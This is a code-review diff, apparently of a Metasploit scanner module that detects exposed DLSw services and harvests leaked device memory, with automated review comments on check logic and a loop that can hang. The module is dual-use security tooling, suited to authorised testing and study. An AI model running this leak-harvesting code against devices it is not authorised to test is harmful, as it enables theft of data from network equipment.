@@ -43,7 +43,7 @@ def initialize
4343 end
4444
4545 def peer
46- peer = "#{ rhost } :#{ rport } "
46+ "#{ rhost } :#{ rport } "
4747 end
4848
4949 def get_response ( size = 8 )
@@ -54,13 +54,24 @@ def get_response(size = 8)
5454 end
5555
5656 # Called when using check
57- def check_host ( ip )
58- print_status ( "Checking #{ peer } for DLSw exposure" )
57+ def check_host ( _ip )
58+ print_status ( "#{ peer } : Checking for DLSw exposure" )
5959 response = get_response
60-
61- dlsw_header = [ "3148015b" ] . pack ( "H*" ) # => "\x31\x48\x01\x5b""
62- if !response . blank? && ( response [ 0 ..3 ] == dlsw_header )
63- print_good ( "#{ peer } : Detected DLSw protocol" )
60+
61+ if response . blank?
62+ vprint_status ( "#{ peer } : no response" )
63+ Exploit ::CheckCode ::Safe
64+ elsif response [ 0 ..3 ] == "\x31 \x48 \x01 \x5b "
65+ vprint_good ( "#{ peer } : Detected DLSw protocol" )
66+ report_service (
67+ host : rhost ,
68+ port : rport ,
69+ proto : 'tcp' ,
70+ name : 'dlsw'
71+ )
72+ # TODO: check that response has something that truly indicates it is vulnerable
73+ # and not simply that it responded
74+ print_good ( "#{ peer } : leaked #{ response . length } bytes" )
6475 report_vuln (
6576 host : rhost ,
6677 port : rport ,
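Review bot: The `response.blank?` branch at new lines 61-63 returns `Exploit::CheckCode::Safe` when the host sent nothing, but silence only shows that no answer arrived (timeout, filtered port, dropped probe), not that the device is unaffected. Returning `Exploit::CheckCode::Unknown` there would keep an unreachable host from being recorded as safe in scan results. In the `elsif` branch, `report_vuln` and `CheckCode::Vulnerable` are reached on a four-byte header match alone, which the added TODO already concedes. Until that check exists, `Exploit::CheckCode::Detected` or `Appears` would match the evidence better than a vulnerability record. The body of check_host continues into the next hunk.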
@@ -70,11 +81,7 @@ def check_host(ip)
7081 )
7182 Exploit ::CheckCode ::Vulnerable
7283 else
73- if response . blank?
74- vprint_status ( "#{ peer } : no response" )
75- else
76- vprint_status ( "#{ peer } : #{ response . size } -byte response didn't contain any leaked data" )
77- end
84+ vprint_status ( "#{ peer } : #{ response . size } -byte response didn't contain any leaked data" )
7885 Exploit ::CheckCode ::Safe
7986 end
8087 end
@@ -86,9 +93,7 @@ def run_host(ip)
8693 dlsw_data = ''
8794 until dlsw_data . length > datastore [ 'LEAK_AMOUNT' ]
8895 response = get_response ( 72 )
89- unless response . blank?
90- dlsw_data << response [ 18 ..72 ]
91- end
96+ dlsw_data << response [ 18 ..72 ] unless response . blank?
9297 end
9398 loot_and_report ( dlsw_data )
9499 end
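Review bot: The loop at new lines 94-97 has no exit when the target stops answering, because `dlsw_data` grows only on a non-blank response and a silent host leaves `until dlsw_data.length > datastore['LEAK_AMOUNT']` spinning indefinitely and stalls the scan. A non-blank response shorter than 18 bytes is a second problem: `response[18..72]` is then `nil`, and `dlsw_data << nil` raises a TypeError. Guarding the slice and leaving the loop on an empty result covers both, e.g. `leak = response.to_s[18..72]`, `break if leak.blank?`, `dlsw_data << leak`. A bounded retry counter would be more tolerant of a single dropped reply. run_host begins outside this hunk, so any earlier setup is not visible here.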
@@ -105,4 +110,3 @@ def loot_and_report(dlsw_leak)
105110 print_status ( "#{ peer } : DLSw leaked data stored in #{ path } " )
106111 end
107112end
108-